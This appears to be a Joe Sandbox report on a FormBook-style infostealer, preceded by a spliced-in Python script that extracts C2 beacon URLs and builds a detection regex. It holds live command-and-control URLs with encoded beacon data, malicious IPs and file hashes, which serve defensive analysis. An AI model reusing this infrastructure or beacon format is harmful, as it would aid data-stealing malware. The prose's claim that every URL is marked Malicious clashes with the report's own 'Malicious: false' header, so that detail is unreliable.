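    "http://www.binjai77rtp11f.xyz/9fei/?irCxl6=9hwMTPf/o+GewSNr0PZcNyjUpNs4oV11JaaOJ/4hdktbA5fMK3ajxj9W7lKuvaKLl9eyr3kbg9/8Pn7CG+MHPzFPLCnPEL+bBN+DL4U4BkbYG2HsYKvT3cQqMuOVV8lKBQ==&0FJ=D00hHLh",
    "http://www.zrichiod-riech.sbs/kf10/?irCxl6=BMr36Ol4rNvSddxqg0HaAfLMG0b3PxYJLrZ3pB2pD+hE5HArYgxCudju8uwut0znVv+lDQdvUK2ZT/OSWW6E73ehYzW1pFh3giqPoWaMqdwg87w/En0YZeFR2W2LB0SR+w==&0FJ=D00hHLh",
    "http://www.rwse6wjx.sbs/gtil/?0FJ=D00hHLh&irCxl6=yyp7zDkplnhFTYOX3ExWxIUq0IjfKVeUoM/g1Z3Itn+WrDb/JBNc3lr1wwtaU5LmbkDFl3V0HSUPXljFvyI/43E9pOq5Y7bgQWtruYXflXEVT6YhdPLVpdYAFb3D0RMErQ==",
    "http://www.showyourstyle.top/zbqa/?irCxl6=VL/7+LncUKg93smxMKx16PJyQUb9eyDUwLSrEzeHp8x1IkOi8uzSCeY3r5BUse/S3M+vRdZQg/I11o5hNVVA7SQLtfVsXWgzAL3L+IJqGxdPdltrLo2WzEd+oOLSgjkcqA==&0FJ=D00hHLh",
    "http://www.rokeyfashion.store/nfd2/?irCxl6=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZB5AOjp44EvTwqJF0vghgjnDPOb2iH8sdTWQtstyoz2bs+w==&0FJ=D00hHLh",
    "http://www.lucelight.info/up4e/?irCxl6=VXc1jWSgqs8x7qdgafwEWVcLTvt60MncsX8sB3hxkBZ1r/WG9R0muDMsDsUoNKEWb3GhLvkp8KOPLwQ4Bi3owHJAbIJD7pBSH8qbt8k3G95dMvpBnol4dqnd3B3JqqcnGw==&0FJ=D00hHLh",
    "http://www.absseguridad.online/3io6/?irCxl6=gcX2VOQ36WC77lysui5XZ/m5rPyYNRmqhqSEheNQdnlbGlnbCsY2Ojxac1DjYk++nD1McxY4sUfZTb3NP1oMnhI4fmsR5776EaSkwHcYG6c3TDmsIPc66LvHumOhTsoWEA==&0FJ=D00hHLh",
    "http://www.vietnamtour.pro/wmxx/?0FJ=D00hHLh&irCxl6=zdZDiDz9NcDAxdPT/uWXYjOZ7xdg3NSLew0AnBcQq7wq0cWPcv1qrwj1W7YWM/gj4sM+0wouZwjbIFjwenXJ+O4VSQPSXkwvnSmJEYaf1BK13FkupONapGDJTjw9KvkhIA==",
    "http://rokeyfashion.store/nfd2/?irCxl6=Nz4SRZ",   # truncated string from memory
    "https://shorty.bio/zSKcZ7",
    "https://www.fastmail.help/hc/en-us/articles/1500000280141",
    "https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.0/jquery.min.js",
]

# Observed in this report: every C2 URL uses a four-character directory.
C2_PATH = re.compile(r"^/[a-z0-9]{4}/$")
# The long parameter value is base64 text (A-Z a-z 0-9 + / with '=' padding).
B64ISH = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def split_query(query: str) -> dict:
    """Split 'k=v&k2=v2' WITHOUT decoding. urllib's parse_qs() would turn the
    '+' inside the base64 blob into a space and silently corrupt the IOC."""
    params = {}
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            params[key] = value
    return params


def classify(url: str) -> dict:
    """Label a URL 'beacon' (C2 path plus a complete two-parameter query),
    'partial' (C2 path but an incomplete query, e.g. a cut-off memory string)
    or 'other'."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    domain = host[4:] if host.startswith("www.") else host
    params = split_query(parts.query)
    record = {"url": url, "host": host, "domain": domain, "path": parts.path,
              "params": params, "kind": "other"}
    if C2_PATH.match(parts.path):
        has_blob = any(len(v) >= 64 and B64ISH.match(v) for v in params.values())
        record["kind"] = "beacon" if has_blob and len(params) == 2 else "partial"
    return record


def extract_iocs(urls) -> dict:
    """Group URLs by kind and derive the invariant parts of the beacon format:
    domains, domain+path pairs, and every query parameter whose value is
    identical across all beacons (the per-build constant)."""
    records = [classify(u) for u in urls]
    beacons = [r for r in records if r["kind"] == "beacon"]
    constant = {}
    if beacons:
        shared_keys = set.intersection(*(set(r["params"]) for r in beacons))
        for key in shared_keys:
            values = {r["params"][key] for r in beacons}
            if len(values) == 1:
                constant[key] = values.pop()
    return {
        "beacons": beacons,
        "partial": [r for r in records if r["kind"] == "partial"],
        "other": [r for r in records if r["kind"] == "other"],
        "domains": sorted({r["domain"] for r in beacons}),
        "paths": sorted({r["domain"] + r["path"] for r in beacons}),
        "constant_params": constant,
    }


def build_signature(constant_params: dict) -> re.Pattern:
    """Regex for the stable beacon skeleton: any host, a four-character
    directory, and one of the constant key=value pairs in any position."""
    if not constant_params:
        raise ValueError("no constant parameter to anchor the signature on")
    pairs = "|".join(re.escape(k) + "=" + re.escape(v)
                     for k, v in sorted(constant_params.items()))
    return re.compile(r"^https?://[^/]+/[a-z0-9]{4}/\?(?:.*&)?(?:" + pairs + r")(?:&|$)")


if __name__ == "__main__":
    iocs = extract_iocs(REPORT_URLS)
    print("beacon domains:", ", ".join(iocs["domains"]))
    print("constant query parameter(s):", iocs["constant_params"])
    sig = build_signature(iocs["constant_params"])
    for r in iocs["beacons"] + iocs["partial"] + iocs["other"]:
        print(f"{r['kind']:8s} {'HIT ' if sig.search(r['url']) else 'miss'} {r['url'][:72]}")
```

Two points worth keeping in mind when reusing this: the report marks every one of these URLs Malicious while Avira URL Cloud returns "safe" for all of them, so the structural signature, not the reputation feed, is what catches the traffic; and the parameter names and the constant D00hHLh come from this sample's URLs alone, so regenerate the signature from each report rather than hard-coding the values.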
URLs found in memory (all flagged Malicious: false)
Memory sources referenced below:
S1 = TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp
S2 = TCPSVCS.EXE, 00000005.00000002.3906452676.0000000005920000.00000004.00000800.00020000.00000000.sdmp
S3 = kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmp
S4 = TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmp
S5 = TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003F7E000.00000004.10000000.00040000.00000000.sdmp
S6 = kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.000000000370E000.00000004.00000001.00040000.00000000.sdmp
S7 = TCPSVCS.EXE, 00000005.00000002.3904938820.0000000004110000.00000004.10000000.00040000.00000000.sdmp
S8 = kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000038A0000.00000004.00000001.00040000.00000000.sdmp
S9 = kwRriiLHUBrBci.exe, 00000006.00000002.3905770259.0000000004FE6000.00000040.80000000.00040000.00000000.sdmp
Name | Source | Antivirus Detection | Reputation
https://cdn.jsdelivr.net/npm/ | S1, S3 | (none) | high
https://cdn.livechatinc.com/tracking.js | S1, S2, S3 | (none) | high
https://duckduckgo.com/chrome_newtab | S4 | (none) | high
https://cdnjs.cloudflare.com/ajax/libs/jquery.lazy/1.7.9/jquery.lazy.plugins.min.js | S1, S2, S3 | (none) | high
https://duckduckgo.com/ac/?q= | S4 | (none) | high
https://cdn.jsdelivr.net/npm/bootstrap | S3 | (none) | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | S4 | (none) | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | S4 | (none) | high
https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.0/jquery.min.js | S1, S2, S3 | (none) | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | S4 | (none) | high
http://rokeyfashion.store/nfd2/?irCxl6=Nz4SRZ | S5, S6 | Avira URL Cloud: safe | unknown
https://cdnjs.cloudflare.com/ajax/libs/jquery.lazy/1.7.9/jquery.lazy.min.js | S1, S2, S3 | (none) | high
https://shorty.bio/zSKcZ7 | S3 | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | S4 | (none) | high
https://www.fastmail.help/hc/en-us/articles/1500000280141 | S7, S8 | Avira URL Cloud: safe | unknown
http://www.absseguridad.online | S9 | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | S4 | (none) | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | S4 | (none) | high
https://www.fastmailusercontent.com/filestorage/css/main.css | S7, S8 | (none) | high
https://www.livechatinc.com/chat-with/13793973/ | S1, S2, S3 | (none) | high
https://www.livechatinc.com/?welcome | S1, S2, S3 | (none) | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | S4 | (none) | high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
69.57.163.64 | www.showyourstyle.top | United States | 25653 | FORTRESSITXUS | true
103.168.172.37 | www.lucelight.info | unknown | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | true
20.2.208.137 | www.3nhc3a.top | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
101.32.205.61 | b1-3-r111.kunlundns.top | China | 132203 | TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | true
188.114.96.3 | www.zrichiod-riech.sbs | European Union | 13335 | CLOUDFLARENETUS | true
84.32.84.32 | absseguridad.online | Lithuania | 33922 | NTT-LT-ASLT | true
172.67.138.138 | www.vietnamtour.pro | United States | 13335 | CLOUDFLARENETUS | true
103.159.36.66 | rokeyfashion.store | unknown | 134687 | TWIDC-AS-APTWIDCLimitedHK | true
104.21.28.65 | www.binjai77rtp11f.xyz | United States | 13335 | CLOUDFLARENETUS | true
                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                              Analysis ID:1587873
                                                                              Start date and time:2025-01-10 18:52:12 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 10m 53s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:2
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:ofZiNLLKZU.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:eeeaa1d7c634e0cc3f1550e756208a118f28be191b374ba6a2e3690f89949751.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@7/3@12/9
                                                                              EGA Information:
                                                                              • Successful, ratio: 75%
                                                                              HCA Information:
                                                                              • Successful, ratio: 90%
                                                                              • Number of executed functions: 47
                                                                              • Number of non-executed functions: 291
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 4.175.87.197, 20.109.210.53
                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
12:54:16 | API Interceptor | 10201295x Sleep call for process: TCPSVCS.EXE modified
Similar samples by contacted IP
Match | Associated Sample Name / URL | Detection | Threat Name | Context
69.57.163.64 | 3HnH4uJtE7.exe | malicious | FormBook | www.startsomething.xyz/9er8/
69.57.163.64 | DHL.exe | malicious | FormBook | www.startsomething.xyz/9er8/
69.57.163.64 | Salmebogs(1).exe | malicious | FormBook, GuLoader | www.openhorizons.pro/ir2n/
103.168.172.37 | Salmebogs(1).exe | malicious | FormBook, GuLoader | www.lucelight.info/ygu8/
103.168.172.37 | firmware.i686.elf | malicious | Unknown | 103.168.172.37/
103.168.172.37 | Fzfee1Lgc2.elf | malicious | Unknown | cloud.hgriggs.com/
103.168.172.37 | Documente de expediere.exe | malicious | FormBook | www.jleabres.com/w977/
103.168.172.37 | jlsvOH1c8bSRKqM.exe | malicious | FormBook | www.jleabres.com/blhi/
103.168.172.37 | eNXDCIvEXI.exe | malicious | FormBook | www.celebration24.co.uk/mcz6/
103.168.172.37 | H25iQbxCki.exe | malicious | FormBook | www.celebration24.co.uk/mcz6/
103.168.172.37 | Factura (3).exe | malicious | FormBook | www.celebration24.co.uk/mcz6/
103.168.172.37 | PO0424024.exe | malicious | FormBook, PureLog Stealer | www.celebration24.co.uk/pq0o/
20.2.208.137 | Arrival Notice.exe | malicious | FormBook | www.b2iqd.top/g8fb/
20.2.208.137 | MV Sunshine.exe | malicious | FormBook | www.b2iqd.top/g8fb/
Similar samples by contacted domain
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.zrichiod-riech.sbs | SHIPPING DOCUMENTS_PDF.exe | malicious | FormBook | 172.67.176.240
www.lucelight.info | Salmebogs(1).exe | malicious | FormBook, GuLoader | 103.168.172.37
b1-3-r111.kunlundns.top | SHIPPING DOCUMENTS_PDF.exe | malicious | FormBook | 101.32.205.61
b1-3-r111.kunlundns.top | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | 43.155.76.124
b1-3-r111.kunlundns.top | SWIFT COPY 0028_pdf.exe | malicious | FormBook | 43.155.76.124
b1-3-r111.kunlundns.top | PO-DC13112024_pdf.vbs | malicious | Unknown | 43.155.76.124
b1-3-r111.kunlundns.top | 3NvALxFlHV.exe | malicious | FormBook | 43.155.76.124
b1-3-r111.kunlundns.top | COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe | malicious | FormBook | 43.155.76.124
b1-3-r111.kunlundns.top | QUOTE2342534.exe | malicious | FormBook | 129.226.56.200
b1-3-r111.kunlundns.top | COMMERCAIL INVOICE AND DHL AWB TRACKING DETAIL.exe | malicious | FormBook | 129.226.56.200
b1-3-r111.kunlundns.top | Re property pdf.exe | malicious | FormBook | 129.226.56.200
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | 3HnH4uJtE7.exe | Get hash | malicious | FormBook | Browse | 104.21.48.233
 | https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modal | Get hash | malicious | Unknown | Browse | 104.17.25.14
 | AHSlIDftf1.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.64.1
 | eLo1khn7DQ.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.64.1
 | Encrypted_Archive_2025_LHC1W64SMW.html | Get hash | malicious | HTMLPhisher | Browse | 104.17.25.14
 | MzqLQjCwrw.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.96.1
 | 3WgNXsWvMO.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.80.1
 | SBkuP3ACSA.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.16.1
 | KcSzB2IpP5.exe | Get hash | malicious | FormBook | Browse | 188.114.96.3
 | secured File__esperion.com.html | Get hash | malicious | Phisher | Browse | 104.17.25.14
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | grW5hyK960.exe | Get hash | malicious | Unknown | Browse | 103.191.208.122
 | grW5hyK960.exe | Get hash | malicious | Unknown | Browse | 103.191.208.122
 | 3.elf | Get hash | malicious | Unknown | Browse | 150.203.42.56
 | 5.elf | Get hash | malicious | Unknown | Browse | 103.190.121.10
 | armv7l.elf | Get hash | malicious | Unknown | Browse | 103.184.255.2
 | Fantazy.mips.elf | Get hash | malicious | Unknown | Browse | 103.179.208.2
 | Fantazy.x86.elf | Get hash | malicious | Unknown | Browse | 103.163.1.75
 | Fantazy.m68k.elf | Get hash | malicious | Unknown | Browse | 103.185.194.66
 | https://t.co/qNQo33w8wD | Get hash | malicious | HTMLPhisher | Browse | 103.67.200.72
 | 3.elf | Get hash | malicious | Unknown | Browse | 157.85.170.191
MICROSOFT-CORP-MSN-AS-BLOCKUS | Encrypted_Archive_2025_LHC1W64SMW.html | Get hash | malicious | HTMLPhisher | Browse | 40.99.149.210
 | secured File__esperion.com.html | Get hash | malicious | Phisher | Browse | 51.144.100.160
 | http://atozpdfbooks.com | Get hash | malicious | Unknown | Browse | 150.171.27.10
 | http://infarmbureau.com | Get hash | malicious | Unknown | Browse | 52.252.156.53
 | https://www.filemail.com/d/rxythqchkhluipl?skipreg=true | Get hash | malicious | Unknown | Browse | 40.126.32.72
 | sora.arm.elf | Get hash | malicious | Mirai | Browse | 104.208.173.191
 | https://eu.jotform.com/app/250092704521347 | Get hash | malicious | Unknown | Browse | 13.107.253.45
 | http://loginmicrosoftonline.Bdo.scoremasters.gr/cache/cdn?email=christian.wernli@bdo.ch | Get hash | malicious | Unknown | Browse | 13.107.253.45
 | 5b118cb6-e85d-926b-b917-b9317aeed46c.eml | Get hash | malicious | Unknown | Browse | 52.113.194.132
 | https://app.planable.io/review/0OPaw36t6M_k | Get hash | malicious | HTMLPhisher | Browse | 13.69.239.72
TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | https://app.whirr.co/p/cm4711if90205nv0h2e4l0imu | Get hash | malicious | Unknown | Browse | 170.106.97.195
 | ReIayMSG__polarisrx.com_#7107380109.htm | Get hash | malicious | HTMLPhisher | Browse | 119.28.146.206
 | ReIayMSG__polarisrx.com_#6577807268.htm | Get hash | malicious | HTMLPhisher | Browse | 119.28.147.117
 | VM_MSG-Gf.htm | Get hash | malicious | HTMLPhisher | Browse | 119.28.147.117
 | https://e.trustifi.com/#/fff2a0/670719/6dc158/ef68bf/5e1243/19ce62/f4cd99/c6b84a/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d78873/cd64d0/869af2/e9ab57/7015c1/91dda7/f34c0a/f30b47/688cba/a1d645/18dc79/33d9f9/9ee0a0/c61099/8f2456/8e1864/996369/790047/a93a09/347b17/38082d/363d49/f88c07/81bae2/57a7bb/6027c6/942952/b2de1b/e98aef/6a05c2/91297b/c70871/7f29c3/0a450d/ad0cac/967c2a/e7cb67/6e1193/8c4088/13aef1/e1d296/5056d4/51a97e/89a35b/c13e69/fa274a/5b7c2e/a8c901/02856f/1e0211/03ca84/d7b573/7e0de3/e2bdbb/7cab47/4dd465/addb41/2076e1/85559c/dbcb2d/514505/a6a54e/41e864/abb5a5/e59e4b/8c2df6/7e5cf3/b648da/8fbd98/4c7d8a/08e6a3/72f66f/a49cc6/18211b/1e6a5c/0d4fde | Get hash | malicious | HTMLPhisher | Browse | 49.51.78.226
 | https://jmak-service.com/3225640388 | Get hash | malicious | HTMLPhisher | Browse | 49.51.77.119
 | https://pozaweclip.upnana.com/ | Get hash | malicious | Unknown | Browse | 170.106.97.195
 | https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8d | Get hash | malicious | HTMLPhisher | Browse | 49.51.77.119
 | Vernales Restaurant-encrypted.pdf | Get hash | malicious | HTMLPhisher | Browse | 170.106.97.195
 | x86_64.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 170.106.90.48
FORTRESSITXUS | 3HnH4uJtE7.exe | Get hash | malicious | FormBook | Browse | 69.57.163.64
 | Benefit_401k_2025_Enrollment.pdf | Get hash | malicious | Unknown | Browse | 69.57.162.6
 | miori.spc.elf | Get hash | malicious | Unknown | Browse | 69.72.254.176
 | sh4.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 208.116.70.219
 | DHL.exe | Get hash | malicious | FormBook | Browse | 69.57.163.64
 | la.bot.mipsel.elf | Get hash | malicious | Mirai | Browse | 65.98.32.221
 | Salmebogs(1).exe | Get hash | malicious | FormBook, GuLoader | Browse | 69.57.163.64
 | http://dimfa.elcompanies.digitalillustra.com | Get hash | malicious | Unknown | Browse | 65.181.111.144
 | RN# D7521-RN-00353 REV-2.exe | Get hash | malicious | FormBook | Browse | 69.57.163.227
 | RFQ 3100185 MAHAD.exe | Get hash | malicious | FormBook | Browse | 69.57.163.227
                                                                              No context
                                                                              No context
                                                                              Process:C:\Windows\SysWOW64\TCPSVCS.EXE
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                              Category:dropped
                                                                              Size (bytes):196608
                                                                              Entropy (8bit):1.1209886597424439
                                                                              Encrypted:false
                                                                              SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                              MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                              SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                              SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                              SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\ofZiNLLKZU.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):287744
                                                                              Entropy (8bit):7.994497537219416
                                                                              Encrypted:true
                                                                              SSDEEP:6144:lLEM3hfMN9F9Ls1QwRxX8aOeybQrBG7TDdhjRcCnBA7VMmSBUjl:+SfMN79A1Qg8llbQ05AqmSBUjl
                                                                              MD5:D19C951F8A1EF322D779439555D66BE2
                                                                              SHA1:8A7DB18E89BD10533396D2946C2DDA526E36454F
                                                                              SHA-256:75E4ACD92558B91EB98B4097CDA515C59C47CA658A6CFF8F7F0F490EF2E2B8D0
                                                                              SHA-512:124F6BD99F94EBE1BA28952C689C292A086C2C279406A77F81FDD25BFBB9438D432B053E6E3C2F822E8D67A15CAC3E5569ADA2D278E954D7F8F935A89CBA96D3
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:}k.7;EZECL0O..W9.BL8YPEE.BN1P601178EZEGL0OKLW9YBL8YPEEIBN1P6.1176Z.KG.9.j.Vu.c.P0#e5;-)C1[.RPYV*.e%).=>"wP7b.w.p(*-'`<]<.1178EZE>M9.v,0.d"+.d0".S...jVW.+...f% .*..kY>..Q:8x%..N1P60117h.ZE.M1O...oYBL8YPEE.BL0[7;11e<EZEGL0OKL.-YBL(YPE5MBN1.60!178GZEAL0OKLW9_BL8YPEEI2J1P401178EXE..0O[LW)YBL8IPEUIBN1P6 1178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0Oe82A-BL8..AEIRN1Pd411'8EZEGL0OKLW9YBl8Y0EEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL
                                                                              Process:C:\Users\user\Desktop\ofZiNLLKZU.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):287744
                                                                              Entropy (8bit):7.994497537219416
                                                                              Encrypted:true
                                                                              SSDEEP:6144:lLEM3hfMN9F9Ls1QwRxX8aOeybQrBG7TDdhjRcCnBA7VMmSBUjl:+SfMN79A1Qg8llbQ05AqmSBUjl
                                                                              MD5:D19C951F8A1EF322D779439555D66BE2
                                                                              SHA1:8A7DB18E89BD10533396D2946C2DDA526E36454F
                                                                              SHA-256:75E4ACD92558B91EB98B4097CDA515C59C47CA658A6CFF8F7F0F490EF2E2B8D0
                                                                              SHA-512:124F6BD99F94EBE1BA28952C689C292A086C2C279406A77F81FDD25BFBB9438D432B053E6E3C2F822E8D67A15CAC3E5569ADA2D278E954D7F8F935A89CBA96D3
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:}k.7;EZECL0O..W9.BL8YPEE.BN1P601178EZEGL0OKLW9YBL8YPEEIBN1P6.1176Z.KG.9.j.Vu.c.P0#e5;-)C1[.RPYV*.e%).=>"wP7b.w.p(*-'`<]<.1178EZE>M9.v,0.d"+.d0".S...jVW.+...f% .*..kY>..Q:8x%..N1P60117h.ZE.M1O...oYBL8YPEE.BL0[7;11e<EZEGL0OKL.-YBL(YPE5MBN1.60!178GZEAL0OKLW9_BL8YPEEI2J1P401178EXE..0O[LW)YBL8IPEUIBN1P6 1178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0Oe82A-BL8..AEIRN1Pd411'8EZEGL0OKLW9YBl8Y0EEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.152298685936598
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:ofZiNLLKZU.exe
                                                                              File size:1'265'664 bytes
                                                                              MD5:68056372ed7e2ab369235bf4c2e9cfb5
                                                                              SHA1:d75a067e94a4da806d391ea85892cc9608e6f455
                                                                              SHA256:eeeaa1d7c634e0cc3f1550e756208a118f28be191b374ba6a2e3690f89949751
                                                                              SHA512:5a5f4ed5b692bbb6c128ae2c5bfa6d76d8d4e343ce99d5531ab2d94f9446e32076eef80c6f92eda38ee1655dc551a7fde58346e3184eb6267d8c334acb9c15e6
                                                                              SSDEEP:24576:XqDEvCTbMWu7rQYlBQcBiT6rprG8aLmH8O1q8vKs4u1I0F7:XTvC/MTQYxsWR7aLmZq3vWT
                                                                              TLSH:3145C00273D1C072FF9BA2334F5AF6515ABC69260123A62F13981D79BE701B1563E7A3
                                                                              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                              Icon Hash:aaf3e3e3938382a0
                                                                              Entrypoint:0x420577
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
